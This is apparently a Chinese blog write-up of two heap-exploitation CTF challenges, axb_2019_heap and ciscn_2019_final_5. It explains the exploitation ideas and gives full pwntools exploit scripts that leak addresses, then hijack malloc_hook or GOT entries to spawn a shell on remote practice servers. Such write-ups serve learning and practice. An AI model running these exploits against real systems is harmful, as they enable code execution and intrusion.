4.13做题随记(axb_2019_heap, ciscn_2019_final_5)

最新推荐文章于 2022-02-28 10:59:50 发布
最新推荐文章于 2022-02-28 10:59:50 发布
阅读量176 收藏
点赞数 1
分类专栏: Pwn 做题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/115697023
版权

4.13做题随记

Column: Apr 14, 2021
Tags: Pwn

相关文件链接

axb_2019_heap

ciscn_2019_final_5

axb_2019_heap:

保护检查:

在这里插入图片描述

利用思路:

banner()中存在明显的格式化字符串漏洞, 因此可以用来泄露栈地址, libc地址以及pie产生的偏移

get_input()中有单字节溢出, 可以修改下一个chunk的inuse位, 从而unlink

因此只要获得偏移后unlink到&note任意读写到malloc_hook, 写上onegadget即可

坑:

Ubuntu16.04本来的libc和buuoj上给的libc不完全一直, 搞得我浪费了一个多小时(麻了)

exp:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
sh=process('./axb_2019_heap')
sh=remote('node3.buuoj.cn', 29374)
elf=ELF('./axb_2019_heap')
libc=ELF('./libc-2.23.so')
#context.log_level='debug'
def Add(index, size, content):
    sh.recvuntil('>> ')
    sh.sendline('1')
    sh.recvuntil(':')
    sh.sendline(str(index))
    sh.recvuntil('Enter a size:\n')
    sh.sendline(str(size))
    sh.recvuntil('Enter the content: \n')
    sh.sendline(content)

def Delete(index):
    sh.recvuntil('>> ')
    sh.sendline('2')
    sh.recvuntil(':\n')
    sh.sendline(str(index))

def Edit(index, content):
    sh.recvuntil('>> ')
    sh.sendline('4')
    sh.recvuntil(':')
    sh.sendline(str(index))
    sh.recvuntil(': ')
    sh.sendline(content)

sh.recvuntil('name: ')
sh.sendline('%19$p%15$p')
sh.recvuntil('Hello, ')
main_current_addr=int(sh.recvuntil('16a'), 16)
start_main_240=int(sh.recv(14), 16)
print hex(main_current_addr)
print hex(start_main_240)
pie_base=main_current_addr-0x116a
start_main=start_main_240-240
libc_base=-libc.sym['__libc_start_main']+start_main
log.success('pie base: '+hex(pie_base))
log.success('libc base: '+hex(libc_base))
main_arena_offest=0x3c4b20
main_arena_addr=libc_base+main_arena_offest
one_gadget=[0x45216, 0x4526a, 0xf02a4, 0xf1147]

Add(0, 0xf8, 'a'*0xf0)
Add(1, 0xf8, 'b'*0xf0)
Add(2, 0xf8, 'c'*0xf0)
note_addr=0x202060+pie_base
Edit(0, p64(0)*2+p64(note_addr-0x18)+p64(note_addr-0x10)+'a'*(0xf8-0x28)+p64(0xf0)+p8(0))
Delete(1)
Edit(0, 'w'*0x18+p64(main_arena_addr-0x1b)+p64(0xf8))
Edit(0, 'w'*0xb+p64(one_gadget[3]+libc_base))
sh.recvuntil('>> ')
sh.sendline('1')
sh.recvuntil(':')
sh.sendline('4')
sh.recvuntil(':\n')
sh.sendline('300')
sh.interactive()

ciscn_2019_final_5:

保护检查:

在这里插入图片描述

利用思路:

理想情况下New()中会根据idx给申请的chunk地址末8位’或’上索引的值提供给全局指针, 但是由于idx的范围为0-16, 所以当idx为16时, 实际效果差不多是指针指向的地址 = chunk地址+0x10 , 导致free的时候可以free到我们的fakechunk上, 且大小自己可控, 从而再次申请可以做到对其它的chunk做到uaf, 最终完成tc attack, 再修改got表什么的都可以

坑:

  1. 因为libc文件没有明确指出其版本, 所以我们首先要用
strings libc.so.6 | grep 2.2

来康康它的版本是否≥2.27, 判断是否可以用tc attack

  1. 因为我一开始没有注意Partial RELRO, 所以导致我做题时卡在了想泄露libc, 却不知道怎么泄露

  2. Edit(), Delete()都是依靠全局指针指向的地址&0xfffffff0来判断后八位是否等于idx, 且0x10与0x0的效果都是0, 要切记这个规则, 我因为2与3的坑导致自己一个人做了两个多小时没做出来去看了别的师傅的wp, 呜呜呜, 我tcl

  3. 修改got表可以直接将tc的next指针修改为相对应的got, 但弊端是要各种大小的chunk, 也可以将got布置在全局指针组成的数组中, 但这样做的弊端是由于Edit的寻址方式, 当got表最后一字节为8时, 需要写入两次地址, 可能会破坏其它函数的地址导致程序无法运行

  4. 记得自己写脚本的时候不要recvuntil(’:’), 因为其他地方也出现了:

exp:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./ciscn_final_5')
sh=remote('node3.buuoj.cn',26368)
elf=ELF('./ciscn_final_5')
libc=ELF('./libc.so.6')
#libc=elf.libc
#context.log_level='debug'   

def New(index, size, content):
    sh.recvuntil('choice: ')
    sh.sendline('1')
    sh.recvuntil('index: ')
    sh.sendline(str(index))
    sh.recvuntil('size: ')
    sh.sendline(str(size))
    sh.recvuntil('content: ')
    sh.send(content)

def Delete(index):
    sh.recvuntil('choice: ')
    sh.sendline('2')
    sh.recvuntil('index: ')
    sh.sendline(str(index))

def Edit(index, content):
    sh.recvuntil('choice: ')
    sh.sendline('3')
    sh.recvuntil('index: ')
    sh.sendline(str(index))
    sh.recvuntil('content: ')
    sh.send(content)

New(16, 0x10, p64(0)+p64(0x91))#0
New(1, 0xc0, 'a')#1
Delete(1)
Delete(0)
New(2, 0x80, p64(0)+p64(0xd1)+p64(0x6020e0))
New(3, 0xc0, 'aa')
New(4, 0xc0, p64(elf.got['free'])+p64(elf.got['puts'])+p64(0x6020e1)+p64(elf.got['atoi']+4)+p64(0)*16+p32(0x10)*8)
Edit(8, p64(elf.plt['puts'])*2)
Delete(0)
puts_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=puts_addr-libc.sym['puts']
log.success('libc base: '+hex(libc_base))
#main_arena_offset=0x3ebc40
#main_arena=libc_base+main_arena_offset
#one_gadget=[0x4f2c5, 0x4f322, 0x10a38c]
#Edit(1, p64(main_arena-0x10))
#Edit(0, p64(one_gadget[1]+libc_base))
log.success('system addr: '+hex(libc_base+libc.sym['system']))
Edit(0xc, p64(libc_base+libc.sym['system'])*2)
sh.recvuntil('choice: ')
#sh.sendline('1')
#sh.recvuntil('index: ')
sh.sendline('/bin/sh\x00')
#sh.recvuntil('size: ')
#sh.sendline('1')
#New(4, 0x30, p64(elf.plt['printf']))
sh.interactive()

其它碎碎念:

女朋友真是一种叫人有的时候心烦, 没的时候心痒的神奇生物(我没物化女性啊, 女👊别打我, 呜呜呜)

14号打算一两道pwn, 然后看漏洞艺术, 再翻译一章给sakura师傅叭

北岛静石
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1006
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 375
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
ciscn_2019_final_5
z1r0的博客
02-28 248
ciscn_2019_final_5 查看保护 当index为16的时候,经过运算保存的地址为0x20其实也就是heap的初初始地址+0x20。一开始没怎么看懂这些逻辑然后看了一下ha1vk的wp就懂了(XD 攻击思路:因为16的时候在堆的+0x20,所以只需要在堆里伪造一个堆块,然后释放再申请就可以改下面的一些堆块,把下面的堆块释放掉之后通过伪造的堆来改他们的fd达到任意地址申请即可。具体的tcache dup看z1r0’s blog from pwn import * context(arch=
ciscn_2019_final_5(临界条件错误,劫持GOT)
m0_51251108的博客
11-11 638
ciscn_2019_final_5: got表可写,pie没开 程序分析: 主界面: add函数: delete函数: 由于一般地址都会16位对齐,这里的free用按位与取前15位,最后一位为0 其实也没啥问题 edit函数: 和delete,都是取最后一位为下标 漏洞分析: 漏洞出现在add函数里的index我们能取0x10,即(0001 0000) 而它如果与倒数第五位为0的heap_ptr按位与的话会导致存进heap_list的地址变大0x10 例:我们申请第一个堆的地址最后三位一般为0x
buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号
carol2358的博客
08-14 587
ciscn_2019_final_5 有趣的题目 涉及位级操作 漏洞的关键是index为16时,二进制为1 0000 edit 他们都是认heap_ptr里最后一个16进制来判断他是index几的,index1最后一位就是1,2就是2,8就是8,4就是4,但问题是他存储是按照你申请的顺序存的,和这个index没啥关系,漏洞就来了 这题很明显是要你改got表 没有show,就把free改成puts来泄漏 exp: from pwn import * from LibcSearcher import ...
arcgis_js_v413_sdk.zip
07-15
4.13版本在图层渲染方面做了优化,支持更多的符号类型和渲染方式,使得地图的视觉效果更为丰富和专业。 其次,空间分析是ArcGIS JS API的重要功能。4.13版本提供了更加强大的分析工具,如缓冲区分析、网络分析、...
arcgis_js_v413_api.zip
07-15
5. **扩展与插件**:ArcGIS API for JavaScript v4.13支持插件开发,可以扩展其功能,如添加定制的图层、工具或者用户界面元素。社区提供大量开源插件,方便开发者快速集成。 6. **响应式设计**:考虑到现代Web应用...
FileDiff 2.rar_差分 TSP_文件 比较
09-24
Tsp的例子:程序计数器 差分计数器... (即是把新生成的程序源文件打印出来) 4.13 可以打印一份程序清单,在修改后的程序的每一行代码前插入行号。 4.14 可以打印一份程序清单,在原来的程序的每一行代码前插入行号。
tsc.rar_The First
09-20
According to WHCI 0.95 [4.13.6] the driver will only receive the RCEB of a SET IE command after the device sent the first beacon that includes the IEs specified in the SET IE command. So, after we ...
00034 4.13_Setting_Up_an_Application_Profile.mp4
12-05
Application Centric Infrastructure ACI LiveLessons
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_final_5
seaaseesa的博客
04-09 427
ciscn_final_5 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序将下标存储到了堆地址的低4位里 操作的时候再清除低4位地址值。 问题就在于当index为16的时候,低4位已经无法表示了,这就造成了溢出 假如我的堆地址为0x10,我的index为16,那么,经过运算,保存的地址为0x20,这样free的时候,就是free(0x20)。因此,我...
【pwn】 ciscn_2019_final_3
Nothing
12-18 1697
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
ciscn_2019_final_3
、moddemod
07-08 650
tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(idx, size, content): p.sendlineafter('choice >', str(1)) p.sendl.
axb_2019_heap
doudoudedi
02-05 930
思路 格式化字符串泄露程序基址和libc基址然后unlink一个指针到bss段将free_hook写入system释放即可拿到shell exp: from pwn import * #p=process('./axb_2019_heap') p=remote('node3.buuoj.cn',29873) elf=ELF('./axb_2019_heap') libc=elf.libc #gdb...
ciscn2019部分writeup
Sea_Sand息禅
06-06 1302
Web 1、JustSoso 拿到源码 打开靶机,查看源码得到提示: 一看就是文件读取,然后就文件读取走一波。 file=php://filter/read=convert.base64-encode/resource=hint.php base64解码拿到hint.php的源码: <?php class Handle{ private $handle; ...
2021羊城杯pwn部分wp
eeeeeight的博客
09-12 6501
前言: 羊城杯的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6027
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2087
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
sock_map_fd是什么
最新发布
05-18
`sock_map_fd`是一种Linux内核中的机制,用于跟踪网络套接字(socket)并允许在用户空间和内核空间之间共享这些套接字。它是Linux内核中的一种特殊类型的文件...`sock_map_fd`在Linux内核版本4.13及以上版本中可用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值